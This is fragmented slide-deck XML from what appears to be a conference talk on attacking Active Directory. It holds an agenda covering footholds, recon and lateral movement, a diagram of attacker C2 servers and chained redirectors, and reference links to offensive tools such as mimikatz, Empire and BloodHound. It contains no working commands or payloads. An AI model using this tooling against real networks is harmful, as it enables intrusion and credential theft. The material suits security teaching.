              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10652931" y="2045321"/>
            <a:ext cx="1257178" cy="0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640F2F-08E6-45AF-BCCA-010ED876FA6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10600033" y="1562635"/>
            <a:ext cx="125717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162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References!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485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="1929142"/>
            <a:ext cx="11723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Tools!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hlinkClick r:id="rId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https://github.com/EmpireProject/Empire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https://github.com/BloodHoundAD/BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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https://github.com/byt3bl33d3r/CrackMapExec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https://www.metasploit.com/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7"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia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8"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powerview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9"/>
              </a:rPr>
              <a:t>https://github.com/danielbohannon/Invoke-CradleCrafter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10"/>
              </a:rPr>
              <a:t>https://live.sysinternals.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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11"/>
              </a:rPr>
              <a:t>https://github.com/gentilkiwi/mimikatz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12"/>
              </a:rPr>
              <a:t>https://github.com/leechristensen/UnmanagedPowerShell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11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References!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485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="1692459"/>
            <a:ext cx="11723114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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Stuff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https://adsecurity.org/?p=2362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https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/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https://www.cyberark.com/threat-research-blog/shadow-admins-stealthy-accounts-fear/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https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/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https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1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https://www.cybereason.com/blog/dcom-lateral-movement-techniques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https://www.ampliasecurity.com/research/windows-credentials-editor/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https://adsecurity.org/?p=2398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https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf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https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf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https://msdn.microsoft.com/en-us/library/aa394553(v=vs.85).aspx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https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/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https://gameofpwnz.com/?p=684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https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html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https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python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https://www.peerlyst.com/posts/popular-attacker-tools-and-techniques-survey-results-bart-blaze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https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/Invoke-Command?view=powershell-5.1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https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html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http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/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C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://technet.microsoft.com/en-us/library/cc772829(WS.10).aspx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1317241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3101" y="816189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Road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04A4E-CC02-47D1-A761-E1D23AF0F3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485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272124" y="2052144"/>
            <a:ext cx="116477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2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 1: High-level Overview and Flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 2: Infrastructure and Initial Footholds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 3: Internal Recon, Identifying Attack Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Part 4: Lateral Movement, Taking the Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Maybe…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Part 5: Post-Ex? Automation? Exfiltration? Avoiding Detection? Persistence?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12910940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E268-3DD2-42FE-8BF9-9767D6F8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7" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking 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04A4E-CC02-47D1-A761-E1D23AF0F3E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26DCB-8D85-4657-BB0E-0454AB0A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37" y="164172"/>
            <a:ext cx="9804073" cy="632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62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C6F7-025A-4B77-85F2-6DAA83802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397" y="462387"/>
            <a:ext cx="11593832" cy="4731829"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Ryan Preston ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depth Security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Teaching an XSS Workshop at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Bsides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> KC on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4/20     --- adding new spots soon!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://bsideskc2018.busyconf.com/bookings/new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8C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321074" y="4192113"/>
            <a:ext cx="11870925" cy="1360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625593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C6F7-025A-4B77-85F2-6DAA83802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074" y="112542"/>
            <a:ext cx="11549849" cy="3741833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Ryan Preston ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Depth Security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Send me feedback!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Slides: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/h3xg4m3s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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8C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321074" y="4192113"/>
            <a:ext cx="11870925" cy="1360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Twitter:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> *Slides also linked in latest tweet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796D75-ADF4-4C2C-A922-413A0FD4E17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604690" y="5816991"/>
            <a:ext cx="4166518" cy="68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rgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slack:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awsm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8158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C98EEAB8-4C66-433E-ACE1-2C0F68BCE2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955317" y="627858"/>
            <a:ext cx="2946078" cy="2007323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/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227E10-7B04-4532-997F-4D608C4B8CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282894" y="1034971"/>
            <a:ext cx="2330585" cy="5676459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/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EB848A-3F78-42C2-B984-C82B48AC4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4062657" y="1034971"/>
            <a:ext cx="2225308" cy="5676460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/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0C6906-F43A-404D-A30E-9B2C28D7FA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370338" y="1034971"/>
            <a:ext cx="1555839" cy="5658856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="5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538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1582272" y="0"/>
            <a:ext cx="9404723" cy="7130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Big Time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F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813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FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r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F2A2AC06-47C4-4E25-AE97-8EBDFDC1A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8492" y="949312"/>
            <a:ext cx="1349879" cy="1243381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33555083-91A0-41AF-BB24-C4C197066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8478" y="3168347"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8703219" y="3164856"/>
            <a:ext cx="1458095" cy="1434429"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7C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72" y="3360445"/>
            <a:ext cx="1038046" cy="11407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ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8875682" y="3658620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B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="33987" y="4463788"/>
            <a:ext cx="2025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Attacker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E040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10614134" y="4372954"/>
            <a:ext cx="1983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Victim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2AE1CDE-1653-4E16-BBC1-EF98913611B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139318" y="1391288"/>
            <a:ext cx="1262778" cy="253951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2542B1-4F87-4D5B-B875-7F95D94A2EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="61" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5255138" y="2638470"/>
            <a:ext cx="1629966" cy="1331037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7CDFCD-726B-4F1C-B6BF-6314912BDF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10190271" y="3982177"/>
            <a:ext cx="476169" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line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4D947B-2C1C-422C-9FBA-731D38F90A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18299488">
            <a:off x="1285497" y="2389767"/>
            <a:ext cx="67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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Graphic 21" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F08DCE1-A459-4216-A1BA-D56DE2205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0738" y="2181270"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87829FF9-3F85-467E-A41B-4EFD715E1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1656" y="3524977"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1238964F-E530-481C-825F-8C9D96847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4499" y="2073701"/>
            <a:ext cx="1349879" cy="13498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56AC67E-9E81-4536-8C5A-AB36E411CB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627021" y="5905038"/>
            <a:ext cx="1012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C2s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1A1F5-A612-4D39-8855-1205363342CA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V="1">
            <a:off x="1139318" y="2748641"/>
            <a:ext cx="1305181" cy="118215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65B0E12-6E55-4DC5-B2A8-3D8260E7EAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18716022">
            <a:off x="1616042" y="2665268"/>
            <a:ext cx="75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EF0BB2-E964-46AB-897F-6776D777A931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834196" y="2540368"/>
            <a:ext cx="506542" cy="98102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441D37-3790-4A74-ADF8-E89256D5BCE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821328" y="3982177"/>
            <a:ext cx="540328" cy="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8A0C54-3473-4C43-B0BA-E734B2F5A70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="62" idx="1"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="2733199"/>
            <a:ext cx="1581927" cy="1248978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08A326-8147-43E5-A18E-46B921D096C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4441603" y="5606326"/>
            <a:ext cx="45176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Chained Domain Redirectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 33" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8538EF2-3BF5-415F-82BF-4179CA5D2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9144" y="3247539"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Graphic 40" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AAF1AC4-8B57-440D-A5FD-5ED049566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461" y="4572485"/>
            <a:ext cx="1349879" cy="134987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06CF66-6E7B-43CB-86A9-C3703C57DB07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="34" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1139318" y="3922479"/>
            <a:ext cx="1289826" cy="832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72EC95F-9A70-49DD-9494-1F7A453367EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547727" y="3572912"/>
            <a:ext cx="75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05591B0-3F53-492A-9378-7E0827787B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139318" y="3930800"/>
            <a:ext cx="1309143" cy="131662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Graphic 44" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85542E5-4B94-4ABB-834F-42FEE12D5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1656" y="1110788"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Graphic 45" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE7E114-4803-4852-98F7-F9D2A45C1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2772" y="4582789"/>
            <a:ext cx="914400" cy="91440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B3F250-743A-4D5D-8DE5-91EEE8491337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3842444" y="5138727"/>
            <a:ext cx="540328" cy="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06B778-49E0-421A-8778-2E9FFEE80138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3817303" y="1391288"/>
            <a:ext cx="540328" cy="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F7877BD-A3FA-4376-BBFD-BA31B8FF247E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="1"/>
            <a:endCxn id="45" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="1492172"/>
            <a:ext cx="1664427" cy="75816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96B406-7AD4-4EE4-8403-8699777F0386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="46" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5297172" y="5039989"/>
            <a:ext cx="1581729" cy="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Graphic 59" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A40206-5A27-44F4-A4F4-56BEC5B9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2201" y="4610157"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Graphic 60" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57342524-EA37-4E5C-B681-C89E404B5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5104" y="3512307"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Graphic 61" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E4BA135-B675-4C77-9E61-56D91B4890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7983" y="2275999"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84EA6B57-927F-4A66-8042-1C1D9DCFFA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0483" y="1034972"/>
            <a:ext cx="914400" cy="91440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B73F408-F48D-489E-BBEB-716E48ACF667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7675189" y="1583353"/>
            <a:ext cx="1200493" cy="2313769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CF11604-7FB3-4E9F-B544-0D6A15DB7CBE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7675188" y="2805584"/>
            <a:ext cx="1200494" cy="1037702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1CA7729-E6D5-4591-89E4-5EE7B67F6526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7580301" y="3843286"/>
            <a:ext cx="1238464" cy="116923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84F77EB-940E-4C6D-AE17-26747CD3694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7683242" y="3843286"/>
            <a:ext cx="1192440" cy="1247220"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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9" name="Graphic 88" descr="Remote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B06078C-847C-47C5-876A-60C08B6D56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3163" y="1724070"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Graphic 89" descr="Remote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263D7585-A42F-4B15-BB4F-8F86BFB85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8137" y="1722301"/>
